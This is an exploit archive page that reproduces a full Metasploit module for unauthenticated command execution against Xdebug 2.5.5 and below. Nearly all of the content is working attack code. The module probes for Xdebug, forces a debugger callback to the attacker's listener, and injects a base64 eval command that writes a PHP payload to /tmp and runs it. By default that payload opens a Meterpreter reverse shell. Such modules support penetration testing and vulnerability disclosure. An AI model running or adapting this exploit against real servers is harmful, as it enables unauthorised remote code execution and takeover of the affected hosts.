Twenty Year Anniversary

xdebug Unauthenticated OS Command Execution

xdebug Unauthenticated OS Command Execution
Posted May 1, 2018
Authored by Mumbai, Shaksham Jaiswal, Ricter Zheng | Site metasploit.com

This Metasploit module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.

tags | exploit, web, arbitrary, php
MD5 | f41618034e1f76ddd17f42794e9dc6c3

xdebug Unauthenticated OS Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
'DisclosureDate' => 'Sep 17 2017',
'Author' => [
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
'Shaksham Jaiswal', # MinatoTW
'Mumbai' # Austin Hudson
],
'References' => [
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
['URL', 'https://paper.seebug.org/397/']
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => [ARCH_PHP],
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))

register_options([
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
Opt::RPORT(80),
OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
])
end

def check
begin
res = send_request_cgi({
'uri' => datastore["PATH"],
'method' => 'GET',
'vars_get' => {
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
}
})
vprint_status "Request sent\n#{res.headers}"
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good("Looks like remote server has xdebug enabled\n")
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end

def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['SRVPORT'],
'LocalHost' => datastore['SRVHOST'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
})

client = server.accept
print_status("Waiting for client response.")
data = client.recv(1024)
print_status("Receiving response")
vprint_line(data)
print_status("Shell might take upto a minute to respond.Please be patient.")
print_status("Sending payload of size #{cmd1.length} bytes")
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => "#{lhost}",
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
}
})
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close